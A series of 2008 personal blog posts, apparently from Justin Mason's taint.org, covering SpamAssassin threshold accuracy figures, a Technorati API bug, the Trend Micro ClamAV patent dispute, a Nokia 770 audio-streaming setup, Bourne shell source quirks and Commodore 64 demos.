				So I was chatting to Danny O'Brien a few days ago.  He noted that he'd reduced his Spamassassin "this is spam" threshold from the default 5.0 points to 3.7, and was wondering what that meant:


  I know what it means in raw technical terms -- spamassassin now marks anything >3.7 as spam, as opposed to the default of five. But given the genetic algorithm way that SA calculates the rule scoring, what does lowering the score mean? That I'm more confident that stuff marked ham is stuffed marked ham than the average person? That my bayesian scoring is now really good?
  
  Do people usually do this without harmful side-effects? What does it mean about them if they do it?
  
  Does it make me a good person? Will I smell of ham? These are the things that keep me awake at night.


It's a good question! Here's what I responded with -- it occurs to me that this
is probably quite widely speculated about, so let's blog it here, too.

As you tweak the threshold, it gets more or less aggressive.

By default, we target a false positive rate of less than 0.1% -- that means 1
FP, a ham marked as spam incorrectly, per 1000 ham messages.  Last time the
scores were generated, we ran our usual accuracy estimation tests, and got a
false positive rate of 0.06% (1 in 1667 hams) and a false negative rate of
1.49% (1 in 67 spams) for the default threshold of 5.0 points.  That's assuming
you're using network tests (you should be) and have Bayes training (this is
generally the case after running for a few weeks with autolearning on).

If you lower the threshold, then, that trades off the false negatives (reducing
them -- less spam getting past) in exchange for more false positives (hams
getting caught). In those tests, here's some figures for other thresholds:

SUMMARY for threshold 3.0: False positives: 290 0.43% False negatives: 313 0.26%

SUMMARY for threshold 4.0: False positives: 104 0.15% False negatives: 1084 0.91%

SUMMARY for threshold 4.5: False positives: 68 0.10% False negatives: 1345 1.13%

so you can see FPs rise quite quickly as the threshold drops.  At 4.0 points,
the nearest to 3.7, 1 in 666 ham messages (0.15%) will be marked incorrectly as
spam. That's nearly 3 times as many FPs as the default setting's value (0.06%).
On the other hand, only 1 in 109 spams will be mis-filed.

Here's the reports from the last release, with all those figures for different
thresholds -- should be useful for figuring out the likelihoods!

In fact, let's get some graphs from that report.   Here is a graph of false positives (in orange) vs false
negatives (in blue) as the threshold changes...



and, to illustrate the details a little better, zoom in to the area between 0% and 1%...



You can see that the default threshold of 5.0 isn't where the FP% and FN% rates meet; instead, it's got a much lower FP% rate than FN%.  This is because we consider FPs to be much more dangerous than missed spams, so we try to avoid them to a higher degree.

An alternative, more standardized way to display this info is as a Receiver Operating Characteristic curve, which is basically a plot of the true positive rate vs false positives, on a scale from 0 to 1.

Here's the SpamAssassin ROC curve:



More usefully, here's the ROC curve zoomed in nearer the "perfect accuracy" top-left corner:



Unfortunately, this type of graph isn't much use for picking a SpamAssassin threshold.  GNUplot doesn't allow individual points to be marked with the value from a certain column, otherwise this would be much more useful, since we'd be able to tell which threshold value corresponds to each point.  C'est la vie!

Update:: this is possible with GNUplot 4.2 onwards, it seems.  great news!  Hat tip to Philipp K Janert for the advice.  here are updated graphs using this feature:





(GNUplot commands to render these graphs are here.)

Update again: much better interactive Flash graphs here.


		
				
			
								
					Microplanets
				
				
    
		Published February 26, 2008	
	
			
			
				Intriguing! Via Glynn Moody comes an interesting new site, Pulse of Open Source:


  To highlight open source activity on Twitter, I have launched a new web application today called The Pulse of Open Source. This is the stream of collective consciousness from the open source community on Twitter. You can follow this stream by simply bookmarking the site and visiting regularly or by adding the RSS feed to your feed reader. You can also create a Twitter account and add the individuals you’d like to follow to your own Twitter friends list if you’d prefer. There is also a mobile version of the site for on-the-go viewing.


I'm not entirely convinced it makes sense -- the "open source community" is a pretty wide and amorphous concept, covering "enterprisey" types like Iona, to conference organisers, to web standards guys to GNOME developers.  That's a wide range.

However, that site links to the original, and a version which resonates better: PulseOfPDX.com, 'the stream of Portland's collective consciousness'. Basically, this is a local syndication site, with microblogging from a community of local Twitterers.  Similar to the "Planet" concept, which aggregates posts from multiple weblogs into a new 'river of news' combined feed, as seen on Planet Antispam, Planet Perl, Planet.journals.ie, but for off-the-cuff Twitter microblog comments. It's a microplanet, to coin a phrase.

I think I might set up one of these for Ireland... what a great idea!

Update: Ted Leung posted about this today as well, I see, linking to this call for an "out-of-the-box" Twitter aggregator:


  In theory, this whole pulse idea could be packaged up to be as easily deployable as “planet” sites. Here, “pulse” is the operational brand-name of aggregating Twitter accounts, where as “planet” is the tried and true operational brand-name of aggregating blogs.


I think I still prefer "microplanet" ;)

Update 2: check out IrishPulse!


		
				
			
								
					Plug plug
				
				
    
		Published February 22, 2008	
	
			
			
				It's been a while since I've posted about good shopping experiences I've had.  Here's a couple:

SoleTrader.co.uk: I'm a terrible shopper. I hate shops, I always wind up having to visit them at their busiest times on the weekend, and the last time I tried to go shopping for a new pair of shoes, I got caught in torrential rain, fell over and broke my thumb instead.  seriously.  So feck that.

Instead, I resolved to buy them online, and that I did -- from SoleTrader.  They had a great range of trainers, I found what I was after, the price was grand, and delivery on time. Shoes are always the same size -- their sizes are standardised, after all -- so naturally they fit fine. All in all, it worked out great.

Be Organic: these guys operate in North Dublin, delivering bags of organic fruit and vegetables to your door, weekly.  We get the Essential Fruit Bag and the Mini Box, with a bi-weekly bag of spuds on top, for EUR 32 per week.  The quality of the food is absolutely fantastic, there's never any spoilage or wilting, and it's always fresh and delicious.  Compared to supermarket fare, it's leagues ahead.  They've also been grand and flexible when we need to tweak the order slightly -- for example we have a veto on celery, and that's not an issue at all.  The only problem would be that they've recently increased their prices... but unfortunately that seems to be a general problem in Ireland these days!


		
				
			
								
					vote for Dustin on Saturday
				
				
    
		Published February 20, 2008	
	
			
			
				A friend of a friend writes:


  Unless you are pretty good at avoiding the media, you will be aware that Dustin the Turkey has been chosen as one of six finalists for RTE's Eurosong, the winner of which will go on to represent Ireland in the Eurovision Song Contest in Serbia in May.
  
  What you may not be aware of is that I wrote and recorded the song with him and need your votes to help get me to Serbia!!!
  
  The TV show will be broadcast live on RTE this Saturday Feb 23rd, at 7pm. It is a televote (a la X-factor format), so get your mobile phones ready. The results are at 9:45pm.
  
  The song, Irlande Douze Points, is a parody on the current types of songs, acts and block-voting in the Eurovision. It may make your ears bleed a bit, you may ask yourself why, but what the hell, send someone you know to the final!!!


Apparently, Dustin urges the contest judges to "give douze points to Ireland, for its lowlands and its highlands, for Terry Wogan's wig and Bono's leather pants. We brought you Guinness and Westlife, 800-years of war and strife, but we all apologise for Riverdance."

Check out the outraged reactions from Ireland's past Eurovision "winners":


  Frank McNamara, who wrote two of the Irish Eurovision winners, asked whether RTE, the state broadcaster that selected the six acts, was “giving two fingers” to Irish 'song'writers. “I think it is absolutely disgraceful."
  
  Shay Healy, who wrote Johnny Logan’s Eurovision hit What’s Another Year?, wondered “how any bunch of grown-ups could come up with this as a solution”
  
  Phil Coulter thought that Eurovision was going “down the tubes”.


The choice on Saturday is between a turkey puppet taking the piss in a Northside accent, and such po-faced "serious pop" mawkfests as '"Double Cross My Heart" performed by Donal Skehan' and '"Time to Rise" performed by Maya'.  snore.  You know it's got to be the turkey.

Here's the official Bebo page, and the Facebook group -- and here's the song itself:



Update: actually, here's another, higher quality clip -- with an entirely different song!  Let's hope this is the one...



Update 2: he won.  Dana and the other professional Eurovision types have been chewing wasps, it's hilarious!


		
				
			
								
					A historical DailyWTF moment
				
				
    
		Published February 14, 2008	
	
			
			
				Today, in work, we wound up discussing this classic DailyWTF.com article -- "Remember, the enterprisocity of an application is directly proportionate to the number of constants defined":

public class SqlWords
{
  public const string SELECT = " SELECT ";
  public const string TOP = " TOP ";
  public const string DISTINCT = " DISTINCT ";
  /* etc. */
}

public class SqlQueries
{
  public const string SELECT_ACTIVE_PRODCUTS =
    SqlWords.SELECT +
    SqlWords.STAR +
    SqlWords.FROM +
    SqlTables.PRODUCTS +
    SqlWords.WHERE +
    SqlColumns.PRODUCTS_ISACTIVE +
    SqlWords.EQUALS +
    SqlMisc.NUMBERS_ONE;
  /* etc. */
}


This made me recall the legendary source code for the original Bourne shell, in
Version 7 Unix. As this article
notes:


  Steve Bourne, at Bell Labs, worked on his version of shell starting from 1974 and this shell was released in 1978 as Bourne shell. Steve previously was involved with the development of Algol-68 compiler and he transferred general approach and some syntax sugar to his new project.


"Some syntax sugar" is an understatement.  Here's an example, from cmd.c:

LOCAL REGPTR    syncase(esym)
        REG INT esym;
{
        skipnl();
        IF wdval==esym
        THEN    return(0);
        ELSE    REG REGPTR      r=getstak(REGTYPE);
                r->regptr=0;
                LOOP wdarg->argnxt=r->regptr;
                     r->regptr=wdarg;
                     IF wdval ORF ( word()!=')' ANDF wdval!='|' )
                     THEN synbad();
                     FI
                     IF wdval=='|'
                     THEN word();
                     ELSE break;
                     FI
                POOL
                r->regcom=cmd(0,NLFLG|MTFLG);
                IF wdval==ECSYM
                THEN    r->regnxt=syncase(esym);
                ELSE    chksym(esym);
                        r->regnxt=0;
                FI
                return(r);
        FI
}


Here are the #define macros Bourne used to "Algolify" the C compiler, in mac.h:

/*
 *      UNIX shell
 *
 *      S. R. Bourne
 *      Bell Telephone Laboratories
 *
 */

#define LOCAL   static
#define PROC    extern
#define TYPE    typedef
#define STRUCT  TYPE struct
#define UNION   TYPE union
#define REG     register

#define IF      if(
#define THEN    ){
#define ELSE    } else {
#define ELIF    } else if (
#define FI      ;}

#define BEGIN   {
#define END     }
#define SWITCH  switch(
#define IN      ){
#define ENDSW   }
#define FOR     for(
#define WHILE   while(
#define DO      ){
#define OD      ;}
#define REP     do{
#define PER     }while(
#define DONE    );
#define LOOP    for(;;){
#define POOL    }


#define SKIP    ;
#define DIV     /
#define REM     %
#define NEQ     ^
#define ANDF    &&
#define ORF     ||

#define TRUE    (-1)
#define FALSE   0
#define LOBYTE  0377
#define STRIP   0177
#define QUOTE   0200

#define EOF     0
#define NL      '\n'
#define SP      ' '
#define LQ      '`'
#define RQ      '\''
#define MINUS   '-'
#define COLON   ':'

#define MAX(a,b)        ((a)>(b)?(a):(b))


Having said all that, the Bourne shell was an awesome achievement; many of the coding constructs we still use in modern Bash scripts, 30 years later, are identical to the original design.


		
				
			
								
					Technorati bloginfo API wierdness
				
				
    
		Published February 13, 2008	
	
			
			
				For the benefit of other Technorati API users...

In a comment on this entry, Padraig Brady mentioned that his blog had mysteriously disappeared from the Irish Blogs Top 100 list.

I investigated, and found something odd -- it seems Technorati has made a change
to their bloginfo API, now
listing weblogs with their 'rank', but without some of the important metadata,
like 'inboundblogs', 'inboundlinks', and with a 'lastupdate' time set to the
epoch (1970-01-01 00:00:00 GMT), in the API.  Here's an example:

<!-- generator="Technorati API version 1.0" -->
<!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN"
                 "http://api.technorati.com/dtd/tapi-002.xml">
<tapi version="1.0">
<document>
    <result>
        <url>http://www.pixelbeat.org</url>
                    <weblog>
                <name>Pádraig Brady</name>
                <url>http://www.pixelbeat.org</url>
                <rssurl></rssurl>
                <atomurl></atomurl>
                <inboundblogs></inboundblogs>
                <inboundlinks></inboundlinks>
                <lastupdate>1970-01-01 00:00:00 GMT</lastupdate>
                <rank>74830</rank>
            </weblog>
                            </result>
</document>
</tapi>


Compare that with this lookup result, on my own blog:

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Technorati API version 1.0" -->
<!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN"
                 "http://api.technorati.com/dtd/tapi-002.xml">
<tapi version="1.0">
<document>
    <result>
        <url>http://taint.org</url>
                    <weblog>
                <name>taint.org: Justin Mason’s Weblog</name>
                <url>http://taint.org</url>
                <rssurl>http://taint.org/feed</rssurl>
                <atomurl>http://taint.org/feed/atom</atomurl>
                <inboundblogs>143</inboundblogs>
                <inboundlinks>227</inboundlinks>
                <lastupdate>2008-02-12 11:48:10 GMT</lastupdate>
                <rank>43404</rank>
            </weblog>
                            <inboundblogs>143</inboundblogs>
                            <inboundlinks>227</inboundlinks>
            </result>
</document>
</tapi>


This bug had caused a number of blogs to be
dropped from the list, since I was using "inboundblogs and inboundlinks == 0"
as an indication that a blog was not registered with Technorati.

It's now worked around in my code, although a side-effect is that blogs which
have this set will appear with question-marks in the 'inboundblogs' and
'inboundlinks' columns, and will perform poorly in the 'ranked by inbound link
count' table (unsurprisingly).

I've posted a query to the support forum -- let's see what the story is.


		
				
			
								
					Interesting Irish Blog Awards shortlistee
				
				
    
		Published February 12, 2008	
	
			
			
				This year's Irish Blog Awards shortlists were posted yesterday.  I maintain
the Irish Blogs Technorati Top 100 list, so
good sources of Irish blog URLs are always welcome; I took the shortlisted blogs
and added them all.

Interestingly, straight in at number 2 went towleroad.com
(warning: not worksafe!).  It has a staggering Technorati rank of 1074 -- way ahead of Donncha's 5831
or Mulley's 8678.  I was pretty
curious as to how an Irish blog could hit those heights without me having heard
of it, so I took a look.

Let's just say the content isn't quite what you'd expect to find in a blog
shortlisted for 'Best News/Current Affairs Blog' -- a little bit short on Irish
news, but heavy on pictures of naked guys getting off with each other. ;)

I took a quick glance, and I couldn't spot any Irish content.   WHOIS says the
the publisher is LA-based.  so I'm curious as to what qualified it as an "Irish
blog"...

(by the way, I tried to leave a comment on the blog
entry,
but it appears Akismet is marking my comments as spam on a number of
Wordpress-based blogs at the moment.  Yes, I am aware of the irony.  No, if
SpamAssassin was a blog-spam filter, it wouldn't do that ;)

Update: it's sorted -- they're now gone.  Also, it appears I've been removed from the Akismet blacklist, yay.


		
				
			
								
					More on the Trend Micro patent
				
				
    
		Published February 12, 2008	
	
			
			
				Dutch free knowledge and culture advocacy group
ScriptumLibre.org has called for a worldwide
boycott of
Trend Micro products.  Their chairman, Wiebe van der Worp, claims Trend Micro's
aggressive use of litigation is "well beyond the borders of decency".

Also, this Linux.com feature has a great
quote from Jim Zemlin, the executive director of the Linux Foundation:


  "A company that files a patent claim against code coming from a widely
  adopted open source project vastly underestimates the self-inflicted damage
  to its customer and community relationships. In today's world, all of our
  customers in the software industry are enjoying the benefits of a wide
  variety of open source projects that provide stability and vendor-neutral
  solutions to the most basic of their computing needs. I talk to those
  customers every day. They consider these claims short-sighted and those that
  assert them to be fearful of their ability to compete in today's economy."


Well said.


		
				
			
								
					Plug: Lenovo service still rocks
				
				
    
		Published February 8, 2008	
	
			
			
				I needed to buy a new laptop for work a few months back, and after a little agonizing between the MacBook Pro and a Thinkpad T61p, I plumped for the latter.  As I noted at the time, one of the major selling points was the quality of IBM/Lenovo's after-sales warranty service, compared to the atrocious stories I'd heard about AppleCare in Europe.  I was, however, taking a leap of faith -- I had used IBM service to great effect in the US, but had never actually tried it out in Ireland.

Sadly, I had to put this to the test today, after the hard disk started producing these
warnings:

/var/log/messages:Feb  7 11:21:13 wall kernel: 
[2075890.116000] end_request: I/O error, dev sda, sector 116189461
/var/log/messages:Feb  7 11:21:38 wall kernel: 
[2075914.824000] end_request: I/O error, dev sda, sector 116189460
/var/log/messages:Feb  7 11:24:18 wall kernel: 
[2076075.072000] end_request: I/O error, dev sda, sector 116189462
/var/log/messages:Feb  7 11:25:05 wall kernel: 
[2076121.932000] end_request: I/O error, dev sda, sector 116189463


It's a brand new machine, and a Hitachi TravelStar 7K100 drive, with a good reputation for reliability -- but these things do happen. :(

Interestingly, I thought this was a case of the Bathtub curve in action -- but this comprehensive CMU study of hard drive reliability notes that the 'infant mortality' concept doesn't seem to apply to current hard-drive technology:


  Replacement rates [of hard drives in a cluster] are rising significantly over the years, even during early years in the lifecycle. Replacement rates in HPC1 nearly double from year 1 to 2, or from year 2 to 3. This ob- servation suggests that wear-out may start much earlier than expected, leading to steadily increasing replacement rates during most of a system’s useful life. This is an in- teresting observation because it does not agree with the common assumption that after the first year of operation, failure rates reach a steady state for a few years, forming the “bottom of the bathtub”.


Anyway, I digress.

I ran the BIOS hard disk self-test, got the expected failure, then rang up
Lenovo's International Warranty line for Ireland.  I got through immediately to
a helpful guy in India, and gave him my details and the BIOS error message; he
had no tricky questions, no guff about me using Linux rather than Windows, and
there were no attempts to sting me for shipping.

There's now a replacement HD (and a set of spare recovery disks, bonus!)
winging their way via 2-day shipping, expected on Tuesday; I'm to hand over the
broken HD to the courier once it arrives. Fantastic stuff!

Assuming the courier doesn't screw up, this is yet another major win for IBM/Lenovo support, and I feel vindicated. ;)

Update: the HD arrived this morning at 10am -- a day early.  Very impressive!


		
				
			
								
					CEAS needs your ham
				
				
    
		Published February 5, 2008	
	
			
			
				CEAS 2008 is doing another Spam Challenge test of various spam-filters, and as part of this, they need samples of ham mail messages.


  As part of the data collection effort, we have set up a website through which
  it is possible to donate non-sensitive legitimate email, to be used in the
  evaluation.  Any kind of email that the recipient considers legitimate is
  welcome, including computer generated (non-spam) messages.
  
  After the CEAS evaluation, the benchmark data will be made publicly available
  to facilitate future reasearch and development in the field of spam
  prevention.


Here is the collection site; they accept UNIX mbox format, and tar.gz or zip files of same, with an 8MB upload limit.


		
				
			
								
					“Threadless New Tees” feed needs fixing
				
				
    
		Published February 4, 2008	
	
			
			
				My "Threadless New Tees" scraper
feed is currently listing all items
as being called 'height="146"'.  This is obviously not correct ;)

I'll fix it ASAP...

Update: fixed!


		
				
			
								
					Remote sound playback through a Nokia 770
				
				
    
		Published February 3, 2008	
	
			
			
				For a while now, I've been using various hacks to play music from my Linux
laptop, holding my main music collection, to client systems which drive the
speakers.

Previously, I used this
setup to play via my MythTV box.
Nowadays, however, my TV isn't in the room where I want to listen to music.
Instead, I have my Nokia 770 hooked up
to the speakers; this plays the BBC Radio 4 RealAudio
streams nicely, and also
the laptop's MP3 collection using a uPnP AV
MediaServer.

I specifically use
TwonkyMedia right
now, playing back via the N770's Media Streamer app. (That works pretty well --
uPnP AV is one of those standards plagued with incompatibilities, but
TwonkyMedia and Media Streamer seem to be a reliable combination.)

However, TwonkyMedia sometimes fails to notice updates of the library, and
nothing has quite as good a music-player user interface as
JuK, the KDE music player and organiser
app, so a way to play directly from the laptop instead of via uPnP would be nice...

A weekend's hacking reveals that this is pretty easily done nowadays, thanks to some cool
features in pulseaudio, the current standard
sound server on Ubuntu gutsy, and the Esound server running on the N770.

Unfortunately, the N770 doesn't (yet) support pulseaudio directly,
otherwise we could use its seriously cool support for RTP multicast streams.  Still, we can hack something up using the venerable
"esd" protocol (again!)
Here's how to set it up...

On the N770:

You need to fix the N770's "esd" sound server to allow public connections.
Set up your wifi network's DHCP server to give the N770 a static
IP address. Log in over SSH, or fire up an xterm.  Run the following:

mv /usr/bin/esd /usr/bin/esd.real

cat > /usr/bin/esd <<EOM
#!/bin/sh
exec /usr/bin/esd.real -tcp -public -promiscuous -port 5678 $*
EOM

chmod 755 /usr/bin/esd
/etc/init.d/esd restart


On the server:

Download this file, and save it as n770.pa.
Edit it, and change server=n770:5678 on the fourth line to use the IP
address or hostname of your Nokia 770 instead of n770.  Then run:

cp n770.pa ~/.n770.pa

cat > ~/bin/sound_n770 <<EOM
#!/bin/sh
pulseaudio -k; pulseaudio -nF $HOME/.n770.pa &
EOM

cat > ~/bin/sound_here <<EOM
#!/bin/sh
pulseaudio -k; pulseaudio &
EOM

chmod 755 ~/bin/sound_here ~/bin/sound_n770


Now you just need to run '~/bin/sound_n770' to redirect sound playback to the
N770, and '~/bin/sound_here' to reset back to laptop speaker output, for the
entire desktop environment.  Nifty!

Update: it appears that things may work more reliably if you add "rate=22050" at the end of the "load-module module-esound-sink" line -- this halves the bitrate of the network stream, which copes better with harsh wifi network conditions.  The n770.pa file above now includes this.


		
				
			
								
					Irish crumblies don’t trust blogs
				
				
    
		Published January 31, 2008	
	
			
			
				It appears a public relations firm, Edelman's, recently performed a phone survey which concluded that bloggers are the "least trusted" group of authority figures source of information in Ireland.  This has been widely reported:

on Edelman Dublin's blog:


  When we consider who we trust the most as a spokesperson in Ireland, the most trusted sources of information include, financial or industry analysts at 62%, followed by a doctor or healthcare specialist at 57%, an NGO representative at 57% and academics at 53%. Bloggers are the least trusted at 7%.


at Silicon Republic:


  Bloggers have emerged as the “least trusted” group in the country.


and on ElectricNews.net:


  "What has been interesting to note in this year's findings is the apparent low standings of bloggers and social media in general," said [Mark Cahalane, managing director of Edelman Dublin]. "One interpretation of the survey would be that bloggers have now entered the mainstream and people no longer distinguish between blogs and ordinary websites. This is also reflected by the fact that numerous high profile bloggers are widely quoted in the media."


However, as Damien noted, Piaras Kelly raised a very significant point about this
-- 'the people surveyed for the research had to fit a certain demographic, including having to be aged between 35-64.' [...] 'A Generational gap is evident.' This press release
corroborates that.  Sure enough, most blog readers (and writers) would tend to be of the younger generation -- a pretty key point, one would
assume, but one that most of the non-blogger coverage has omitted ;)

(Update: the term "authority figure" wasn't quite correct; replaced with what Edelman themselves use, "source of information".)


		
				
			
								
					Trend Micro’s attack on open source
				
				
    
		Published January 29, 2008	
	
			
			
				Trend Micro are demanding that Barracuda Networks pay licensing fees, alleging that they infringe U.S. Patent No. 5,623,600 with their use of the open-source anti-virus tool ClamAV.  Here's a Barracuda press release, and here's some details from Barracuda:


  Trend Micro alleges that Barracuda Networks and ClamAV infringe on Trend Micro's U.S. Patent No. 5,623,600.  Barracuda Networks believes that the patent is invalid due to prior art and further believes that neither its products nor the ClamAV software infringe the patent.
  
  On Sept. 21, 2006, Trend Micro sent Barracuda Networks a letter regarding a license to Trend Micro's '600 patent.  After several discussions on paying a license for the patent, Trend Micro demanded Barracuda Networks either remove ClamAV from its products or pay a patent license fee. Barracuda Networks felt it had no choice other than to file for a declaratory judgment in early 2007 in U.S. Federal Court to invalidate Trend Micro's '600 patent and end continued legal threats against Barracuda Networks for use of the free and open source ClamAV software.
  
  Trend Micro subsequently responded to that declaratory action and more recently, Trend Micro filed a claim with the International Trade Commission (ITC).  The ITC voted to investigate the claim in December 2007.  Trend Micro's ITC claim alleges that Barracuda Networks infringes on Trend Micro's '600 patent, but effectively implies that anyone using the free and open source ClamAV software at the gateway infringes the patent.


The interesting aspects of this case, from my point of view, are twofold -- the
patent is a classic bad software patent, very broad and totally obvious both
now and at the time it was issued; and it hinges on Barracuda's use of the free
software antivirus product, ClamAV. Given Apache
SpamAssassin's prevalence in many anti-spam
mail filtering appliances (including Barracuda!), this is a very worrying
precedent for us -- our product could be next, for some other patent troll
company's extortion scheme.

For what it's worth, it appears this patent has long been a licensing moneyspinner for Trend.  In 1997, once the patent was issued, Trend went on a spree; McAfee, Symantec and Integralis were sued, eventually buying licenses, as did Electric Mail Company.  2 years ago, Fortinet were sued and settled in their case.

I happily gave Barracuda a quote for their press release on this:


  "Trend Micro's actions are clearly an attack on free and open source software and its users, as well as on Barracuda Networks.  The '600 patent covers a trivial method, one which was obvious to anyone skilled in the art at the time the patent was written, and should be rendered invalid as soon as possible.  I hope that Barracuda Networks is successful in its attempts to defend all users from this patent shakedown."


If you know of prior art for this patent, please head over to Barracuda's site and provide details -- helping to fend off this protection racket would be good for all of us.  Barracuda say:


  People should look for art dated prior to Trend Micro's filing date of September 26, 1995. The '600 patent is entitled "Virus Detection And Removal Apparatus For Computer Networks." We are interested in all material, including software, code, publications or papers, patents, communications, other media or Web sites that relate to the technology described prior to the filing date.
  
  In particular, this prior art should show antivirus scanning on a firewall or gateway. However, many of the claims do not require virus detection at a gateway. So any material that illustrates virus scanning on a file server is also of interest.
  
  We also believe that a product called MIMESweeper 1.0 from a company called Clearswift, Authentium, or Integralis anticipates several claims of the '600 patent. We have yet to locate a copy of this product and would appreciate anyone who has a copy sending it our way.


Some more coverage:


Don Marti at LinuxWorld: 'Regardless of the decision in this case, software patent trolls will continue to be a problem for all software companies, Eben Moglen says. "Getting them to [not operate] in your neighborhood is the best you can do."'
Matt Asay at C|Net: 'Antivirus and antispam innovation has tended to come from open source, not the large proprietary vendors. Trend Micro's lawsuit is designed to put cash in its pocket but will end up hurting the consumer.' (Matt led with my quote ;)
GrokLaw: 'Anyone using ClamAV, should Trend Micro be successful, is potentially a target.'
Ars Technica: 'The patent is very clearly without merit, but that hasn't stopped Trend Micro from using it to threaten ClamAV and extort money from several companies. Situations like this demonstrate a very urgent need for patent reform and illuminate the risks posed by broad software patents, particularly in the area of security.'


		
				
			
								
					Interview with two phish-scene infiltrators
				
				
    
		Published January 28, 2008	
	
			
			
				/. posted a link to this interview with Nitesh Dhanjani and Billy Rios, two guys who have infiltrated the "phishing underground".

It's a good article -- lots of detail on the current toolset of a typical phisher,
and some details on the community itself:


  I had always thought that most phishers were clever hackers evading authorities using the latest evasion techniques and tools. The reality of the matter is most of the phishers we tracked were sloppy and unsophisticated. The tools they used were rarely created by the phisher deploying the actual scam, and for the most part it seemed the phisher merely downloaded kits and tools from some place and reused over and over and over again. It also seemed that many phishers don't even really understand how the phishing kits they've deployed work! We also came across many phishing kits and tools that had simple backdoors written into the source code (essentially, phishers phishing phishers). These backdoors are easily spotted by anyone who has even a basic idea of how the source code flow worked, yet was undetected by many phishers. Maybe a few phishers out there are skilled, but the majority are clueless.


Here's something I've noted about spammers, too -- there's no honour among thieves:


  The number of backdoors we saw was staggering. The servers serving the phishing sites had backdoors, the code used in the phishing kits had backdoors, the tools used by phishers had backdoors. Phishers aren't afraid to steal from regulars people and they are also not afraid to steal from other phishers. Some of the backdoors were meant to keep control over a compromised server, while other simply stole information that had been stolen by other phishers! We came across several forums where phishers, scammers, and carders basically identified other phishers, scammers, and carders that had scammed them. These shady characters may work with each other but they sure don't trust each other, that's for sure.


And this is a very important point about blacklists:


  Phishers are likely to abuse the blacklists published for [anti-phishing] plugins for their own benefit. The blacklists are a list of known phishing sites that the plugins consume in order to identify what websites are fraudulent. These blacklists therefore contain IP addresses and host names of servers hosting phishing sites. Since phishing sites are commonly installed on servers that have been compromised, and phishers don't bother to patch systems they have installed their kits on, this list translates to a 'list of easily compromisable hosts' for other phishers.


On the latter point, this is one of the key benefits of DNS blocklists, compared to the downloaded, text-based style that Google initially used for its anti-phishing toolbar.  To query a DNSBL, you need to know the address you're looking for first of all; but with a text file, you can read the lists in their entirety, without knowing the address in advance.  (Google is now apparently tending to use the enchash format, which fixes this.)

And a final word:


  For the next few years, we are going to continue to apply band-aids around the problem of data leakage, and continue to play whack-a-mole with the phishers without solving the actual problem at hand. In order to make any significant progress, we must come up with a brand new system that does away with depending on static identifiers. We will know weâ??ve accomplished this when we will be able to publish our credit reports publicly without fearing for our identities.


(I'd place more importance on the liability of the financial institutions, myself -- I think they get away with placing too much blame on the victims of fraud and identity theft.)

Good interview -- worth reading.


		
				
			
								
					Insane Dell.ie markup
				
				
    
		Published January 21, 2008	
	
			
			
				A good deal came up on a mailing list I'm on: SAMSUNG 245BW Black High Glossy 24" 5ms DVI Widescreen LCD Monitor for $459.99, or $409.99 after rebate, via Newegg.

A follow-up from a German poster: he'd just picked up a Dell 2407WFP-HC 'for the low, low price of 659 EUR'.

We marvelled at the price difference -- then I looked up Dell.ie forcomparison.  I thought 659 EUR was bad, but Dell.ie is asking for 1,117.74 Euros inc VAT for the same product -- insane!!

What possible excuse could there be for that?  EUR 458.74 worth of shipping maybe?
Do they encase it in platinum? That's nearly three times the price of the Newegg monitor.

Update: Duh.  I'm an idiot.  That's a 2707WFP, not a 2407WFP;  it's 3" bigger and quite a bit fancier. It appears Dell.ie is no longer selling the 2407WFP.


		
				
			
								
					Bad law in North Dakota
				
				
    
		Published January 17, 2008	
	
			
			
				This is very bad news for North Dakota-based anti-spammers -- a guy called
David Ritz is being sued there by alleged porn spammer Jerry Reynolds, for
performing DNS lookups, a DNS zone transfer and a Whois lookup.   It appears
the judge has found Ritz guilty.

This is astonishingly bad lawmaking by the judge.  These are entirely innocuous
tools, part of every network administrator's toolkit for debugging and
examining internet traffic legitimately.  There's nothing remotely criminal or
malicious in their use, and the judge has allowed himself to be misled.

North Dakota Judge Gets it Wrong:

'Ritz's behavior in conducting a zone transfer was unauthorized within the meaning of the North Dakota Computer Crime Law. A zone transfer is simply asking a DNS server for all the particular public info it provides about a given domain. This is a common task performed by system administrators for many purposes. The judge is saying that DNS zone transfers are now illegal in North Dakota.'

More details from Ed Falk

David's legal defense fund


		
				
			
								
					My Commodore 64 demos
				
				
    
		Published January 10, 2008	
	
			
			
				I recently came across my record at the Commodore Scene Database, and was happy to find that someone had found and uploaded two demos I had written, back in my days as a member of the C=64 demo scene between 1988 and 1990:


Stercoraphasia
Mastocephaloid


(I was a member of the groups 'Excess' and 'Thundertronix' / 'TNT', going by the handle of 'Mantis'.)

With the help of CBA, I was overjoyed to track down another long-lost demo, my crowning achievement on the platform:


Rhaphanadosis


If you're curious, feel free to go read those wiki pages or download the .d64's -- they run fine in VICE, the Commodore emulator (amazingly).  If you've only got time to check one, check Rhaphanadosis; it's much better than the others.

I'm very impressed with VICE.  As far as I can tell, it's perfectly bug-for-bug
compatible with the real hardware, playing all of the demos perfectly (apart
from a little additional speed due to differing hardware performance). If you haven't already got VICE set up, bear in mind that after installing it, you'll need a copy of the C=64's ROM images; here's a local set.

Also, the Commodore Scene Database is pretty awesome -- it's a full-scale IMDB-style setup, tracking the history of the Commodore demo scene in massive detail.  Nice work guys!

The demos were written 100% in 6502/6510 assembly.  I developed them using an Action Replay cartridge's built-in monitor; it had an assembler, but one which didn't support symbolic addressing. In other words, every piece of assembly used hand-computed branch offsets, and every variable and subroutine was tracked -- on paper -- by memory location, rather than using symbolic labels. If you want to know what the monitor was like, the VICE built-in monitor is almost identical!

I wrote these when I was 16; part 4 of Rhaphandosis notes the date as being 20
May 1989.

It's interesting reading the scrollers, and doing web and CSDB searches in follow-up to see what happened next --- one of the other Excess members, Raistlin is now Robert Troughton, a successful game developer in the UK with several major titles under his belt.

A Google search for Thundertronix finds a copy of "sex'n'crime" zine, issue 17, July 1990, which notes:


  one of the new groups formed in 1990 (jm: slightly off, I think) is
  THUNDERTRONIX, better known as TNT.
  they are based in ireland and are doing
  very well for themselves. they have, in
  my mind, one of the best coders in the
  uk, namely MANTIS. he is currently
  coding a game with many new routines,
  etc... hopefully he should get some
  demos out soon!


woo!  Er, unfortunately that game never went anywhere.  ah well. ;)

BTW, it's funny reading my scrollers in those demos.  At the time, I was convinced that the c=64 was a dead platform -- yet here we are in 2008, and there's still a thriving demo scene on the Commodore.  Incredible!


		
				
			
								
